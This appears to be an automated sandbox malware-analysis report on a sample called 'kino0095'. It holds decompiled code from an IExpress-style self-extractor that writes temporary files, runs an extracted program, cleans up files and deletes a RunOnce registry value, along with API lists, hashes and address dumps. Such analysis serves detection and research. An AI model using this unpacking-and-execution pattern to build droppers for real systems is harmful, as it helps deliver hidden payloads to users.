0x00306ad9
0x00306ad9
0x00306ae9
0x00306af0
0x00306af2
0x00000000
0x00306af4
0x00306af4
0x00306afb
0x00306afb
0x00306af2
0x00306ac7
0x00306ac7
0x00306ac9
0x00306b0b
0x00306b0b
0x00306b11
0x00306b13
0x00306b18
0x00306b1d
0x00306b24
0x00306b24
0x00306b30
0x00306b39
0x00306b39
0x00306b3b
0x00306b42
0x00306b57
0x00306b5f
0x00306b65
0x00306b65
0x00306b67
0x00306b6c
0x00306b6e
0x00306b71
0x00306b74
0x00306b74
0x00306b79
0x00000000
0x00000000
0x00306b7d
0x00306b81
0x00000000
0x00000000
0x00306b83
0x00306b8c
0x00306b8d
0x00306b90
0x00306b90
0x00306b83
0x00306b81
0x00306b94
0x00306b98
0x00306ba2
0x00306b9a
0x00306b9a
0x00306b9a
0x00306ba3
0x00306bab
0x00306bb0
0x00306bb5
0x00306bbc
0x00306bbf
0x00000000
0x00306bbf
0x00306c1e
0x00306c25
0x00306c27
0x00306c2d
0x00306c2d
0x00306c32
0x00000000
0x00306bc5
0x00306bc5
0x00306bc8
0x00306bcc
0x00306bce
0x00306bce
0x00306bd1
0x00306bd3
0x00306bd3
0x00306bd6
0x00306bda
0x00306be1
0x00306be3
0x00306be5
0x00306be5
0x00306be6
0x00306be6
0x00306be9
0x00306bea
0x00306bea
0x00306b74
0x00306c39
0x00306c3e
0x00306c3e
0x00306abe
0x00306abe
0x00000000

APIs

Part of subcall function 00307155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00307182
Part of subcall function 00307155: GetCurrentProcessId.KERNEL32 ref: 00307191
Part of subcall function 00307155: GetCurrentThreadId.KERNEL32 ref: 0030719A
Part of subcall function 00307155: GetTickCount.KERNEL32 ref: 003071A3
Part of subcall function 00307155: QueryPerformanceCounter.KERNEL32(?), ref: 003071B8

GetStartupInfoW.KERNEL32(?,003072B8,00000058), ref: 00306A7F
Sleep.KERNEL32(000003E8), ref: 00306AB4
_amsg_exit.MSVCRT ref: 00306AC9
_initterm.MSVCRT ref: 00306B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00306B49
exit.KERNELBASE ref: 00306BBF
_ismbblead.MSVCRT ref: 00306BDA

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: e6ced1e9919db646faba802d63a9c77f0089558f54b3d9e184d0ea8c05bc9023
Instruction ID: ca938a513de60869965b473b238c6695603041204c2cd1f5dd84e5c88e84a4bc
Opcode Fuzzy Hash: e6ced1e9919db646faba802d63a9c77f0089558f54b3d9e184d0ea8c05bc9023
Instruction Fuzzy Hash: 3E4105B09077258FEB279B69DC367AA77ECAB44720F11402BE881E72D5CF7448518B90

Uniqueness

Uniqueness Score: -1.00%

Function 003058C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E003058C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00301680(_t20, _t36, _t33);
					E0030658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x309124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E003044B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x309124 = E00306285();
					_t14 = 0;
				}
				return _t14;
			}

0x003058cd
0x003058d1
0x003058d3
0x003058d5
0x003058d8
0x003058d8
0x003058da
0x003058db
0x003058e1
0x003058ed
0x003058f1
0x0030591e
0x0030592c
0x00305943
0x0030594a
0x0030594d
0x00305953
0x00305959
0x00000000
0x0030595b
0x0030595c
0x00305963
0x0030596c
0x00000000
0x00305972
0x00305974
0x0030597a
0x0030597a
0x0030596c
0x003058f3
0x00305901
0x00305906
0x0030590b
0x00305910
0x00305910
0x00305918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00305534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003058E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00305534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00305943
LocalFree.KERNEL32(00000000,?,00305534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030594D
CloseHandle.KERNEL32(00000000,?,00305534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0030595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00305534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00305963

Strings

TMP4351$.TMP, xrefs: 00305923
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003058CD, 003058CF, 00305919, 00305962

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-3033780695
Opcode ID: cb448a8928d8887aa393a44d50ad0e19f100a871f062d8078e6d3b8175c38bb5
Instruction ID: 05bcb522ff6e38d57d2c9cf9c38039a96096b38299dad2b209a2f86ee424213f
Opcode Fuzzy Hash: cb448a8928d8887aa393a44d50ad0e19f100a871f062d8078e6d3b8175c38bb5
Instruction Fuzzy Hash: A6113472703614ABC7261F7AAC6DB9B7F9DDF46360F104616F60AD72D1CB7088158AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00303FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00303FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x308004; // 0xcd371c79
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00306CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x309124 = E00306285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E003044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x308a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x309a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x309a2c = _t44;
						}
					}
				}
				E0030411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x309a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00303fef
0x00303ffa
0x00304001
0x00304008
0x0030400a
0x0030400b
0x00304010
0x0030410a
0x0030411a
0x0030411a
0x0030401c
0x0030401d
0x0030401e
0x0030401f
0x00304033
0x0030403b
0x003040ca
0x003040e9
0x003040f8
0x00304101
0x00304106
0x00304106
0x00304108
0x00304108
0x00000000
0x00304108
0x00304049
0x0030405c
0x00304062
0x00304068
0x0030406e
0x00304070
0x00304077
0x0030407f
0x00304089
0x0030408b
0x0030408b
0x00304089
0x00304077
0x00304091
0x0030409c
0x003040a8
0x003040b8
0x00000000
0x003040c2
0x00000000
0x003040c2

APIs

CreateProcessA.KERNELBASE ref: 00304033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00304049
GetExitCodeProcess.KERNELBASE ref: 0030405C
CloseHandle.KERNEL32(?), ref: 0030409C
CloseHandle.KERNEL32(?), ref: 003040A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003040DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003040E9

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 7b64bbf5385eda6eb02a6eeb1859345defb1f10058c55508885b53123e1a5d40
Instruction ID: 7e9f0b559ce906f44f5363cf016ede6f8d4228d235f7d036f3cf21ffc2679af4
Opcode Fuzzy Hash: 7b64bbf5385eda6eb02a6eeb1859345defb1f10058c55508885b53123e1a5d40
Instruction Fuzzy Hash: EB31D671643308ABEB229F65DC69FABB77CEB94710F10416AF645E51A1C6304D81CF11

Uniqueness

Uniqueness Score: -1.00%

Function 003051E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003051E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0030468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0030468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E003044B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x309124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x309124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E003044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x309124 = 0x80070714;
					goto L10;
				}
				E003044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x309124 = E00306285();
				goto L10;
			}

0x003051fb
0x00305207
0x0030520b
0x0030523c
0x00305268
0x00305270
0x0030528b
0x00305293
0x0030529c
0x003052a6
0x003052b0
0x00000000
0x003052b0
0x0030529e
0x00305279
0x00000000
0x0030527b
0x00305273
0x00000000
0x00305273
0x0030524a
0x00305250
0x00305256
0x00000000
0x00305256
0x00305219
0x00305223
0x00000000

APIs

Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
Part of subcall function 0030468F: SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
Part of subcall function 0030468F: LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
Part of subcall function 0030468F: LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
Part of subcall function 0030468F: memcpy_s.MSVCRT ref: 003046E5
Part of subcall function 0030468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00302F4D,?,00000002,00000000), ref: 00305201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00305250

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Part of subcall function 00306285: GetLastError.KERNEL32(00305BBC), ref: 00306285

Strings

UPROMPT, xrefs: 003051EF, 00305230
<None>, xrefs: 00305262

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: fb823f558cf0b8e954870d75900bce1d4bd312dedf2b9435adb8b27261cc08e8
Instruction ID: 1ef5256d845353c5207f4c821a65d3bffabf3a96606505f0fa46e208e678a88f
Opcode Fuzzy Hash: fb823f558cf0b8e954870d75900bce1d4bd312dedf2b9435adb8b27261cc08e8
Instruction Fuzzy Hash: FD11B2B5303605ABE32B6B715C79B3B719DDF89380F11482AF742DA1D1DAB98C014964

Uniqueness

Uniqueness Score: -1.00%

Function 003052B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E003052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x308004; // 0xcd371c79
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x3091e0; // 0x3427af0
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x308a24 == 0 &&  *0x309a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x308a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x308a24 == 0 &&  *0x309a30 == 0) {
					_push(_t22);
					E00301781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x309a34 & 0x00000020) != 0) {
						E003065E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00302390( &_v268);
					_t11 =  *0x308a20; // 0x0
				}
				if( *0x309a40 != 1 && _t11 != 0) {
					_t11 = E00301FE1(_t22); // executed
				}
				 *0x308a20 =  *0x308a20 & 0x00000000;
				return E00306CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x003052b6
0x003052b6
0x003052b6
0x003052c1
0x003052c8
0x003052cb
0x003052cc
0x003052d4
0x003052d6
0x003052d7
0x003052de
0x003052e0
0x003052f2
0x003052fa
0x003052fa
0x00305302
0x00305305
0x0030530c
0x00305312
0x00305316
0x00305316
0x00305317
0x0030531c
0x0030531f
0x00305333
0x00305345
0x00305351
0x00305359
0x00305359
0x00305363
0x00305369
0x0030536f
0x00305374
0x00305374
0x00305381
0x00305387
0x00305387
0x0030538f
0x003053a0

APIs

SetFileAttributesA.KERNELBASE(03427AF0,00000080,?,00000000), ref: 003052F2
DeleteFileA.KERNELBASE(03427AF0), ref: 003052FA
LocalFree.KERNEL32(03427AF0,?,00000000), ref: 00305305
LocalFree.KERNEL32(03427AF0), ref: 0030530C
SetCurrentDirectoryA.KERNELBASE(003011FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00305363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00305334

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-3647970563
Opcode ID: 88b884ff0975e257b568ee2277345a751f38cd95fec1a22ae169d296837f29b3
Instruction ID: aa9c7a1abfa9046c03ffd22dc7a7e586b4a517a4ae8cc054305f8d270d53e3e7
Opcode Fuzzy Hash: 88b884ff0975e257b568ee2277345a751f38cd95fec1a22ae169d296837f29b3
Instruction Fuzzy Hash: DD21AE35A03A08DFDB379B24EC39B6A77A8AB14750F05019BE882565E1CFB05D94CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00301FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00301FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x308530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00301fee
0x00302005
0x0030200d
0x00302017
0x00000000
0x00302020
0x0030200d
0x00302029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0030538C,?,?,0030538C), ref: 00302005
RegDeleteValueA.KERNELBASE(0030538C,wextract_cleanup1,?,?,0030538C), ref: 00302017
RegCloseKey.ADVAPI32(0030538C,?,?,0030538C), ref: 00302020

Strings

wextract_cleanup1, xrefs: 00301FE7, 0030200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00301FFB

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
API String ID: 849931509-1592051331
Opcode ID: a8510bc12a7e851b5c5f13dc571744779e11c3d8026195d86a3f96ff919c993a
Instruction ID: 452fb0862bf11b0f75ce51055ff2df8ab3b2cbde70f82afca433e12ebb956c69
Opcode Fuzzy Hash: a8510bc12a7e851b5c5f13dc571744779e11c3d8026195d86a3f96ff919c993a
Instruction Fuzzy Hash: 58E04F31952718BBD7238B90FC2EF5A7B2DF701740F100196FA04A00E0EB625A14E709

Uniqueness

Uniqueness Score: -1.00%

Function 00304CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00304CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x308004; // 0xcd371c79
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x3091d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00304E99(_t75);
						L35:
						return E00306CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x308584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x3091e4;
						_t58 = 0x3091e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x3091e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x3091e4;
						_t30 = E00304702( &_v268, 0x3091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0030476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00304980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E003047E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x3093f4 =  *0x3093f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x3091e4;
						_t63 = 0x3091e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x3091e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x3091e4;
						_t30 = E00304702( &_v268, 0x3091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00304C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00304B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00304B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00304cd0
0x00304cdb
0x00304ce0
0x00304ce2
0x00304cee
0x00304cf2
0x00304d0e
0x00304d0e
0x00304d11
0x00304e83
0x00304e88
0x00304e98
0x00304e98
0x00304d17
0x00304d17
0x00304d1a
0x00304d2f
0x00304d2f
0x00000000
0x00304d2f
0x00304d1c
0x00304d1c
0x00304d1f
0x00304dcb
0x00304dd0
0x00304dd2
0x00304ddd
0x00304ddd
0x00304de3
0x00304de8
0x00304ded
0x00304ded
0x00304def
0x00304df0
0x00304df0
0x00304df4
0x00304df4
0x00304df6
0x00304df9
0x00304dfc
0x00304dfc
0x00304dfe
0x00304dff
0x00304dff
0x00304e03
0x00304e08
0x00304e0a
0x00304e0f
0x00304d03
0x00304d03
0x00000000
0x00304d03
0x00304e18
0x00304e20
0x00304e25
0x00304e27
0x00000000
0x00000000
0x00304e33
0x00304e38
0x00304e3a
0x00000000
0x00000000
0x00304e40
0x00304e51
0x00304e56
0x00304e5b
0x00304e5e
0x00000000
0x00000000
0x00304e6a
0x00304e6f
0x00304e71
0x00000000
0x00000000
0x00304e77
0x00304e7d
0x00000000
0x00304e7d
0x00304d25
0x00304d25
0x00304d28
0x00304d36
0x00304d3b
0x00304d40
0x00304d40
0x00304d42
0x00304d43
0x00304d43
0x00304d47
0x00304d4a
0x00304d4a
0x00304d4c
0x00304d4f
0x00304d4f
0x00304d51
0x00304d52
0x00304d52
0x00304d56
0x00304d5b
0x00304d5d
0x00304d62
0x00000000
0x00000000
0x00304d67
0x00304d6f
0x00304d74
0x00304d76
0x00000000
0x00000000
0x00304d7c
0x00304d84
0x00304d89
0x00304d8b
0x00000000
0x00000000
0x00304d94
0x00304d99
0x00304d9e
0x00304da1
0x00304daa
0x00304daa
0x00304da3
0x00304da3
0x00304da3
0x00304db5
0x00304dbb
0x00304dbd
0x00000000
0x00304dc3
0x00304dc5
0x00000000
0x00304dc5
0x00304dbd
0x00304d2a
0x00304d2a
0x00304d2d
0x00000000
0x00000000
0x00000000
0x00304d2d
0x00304cf8
0x00304cfd
0x00304d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00304DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00304DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00304D36, 00304DE3

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

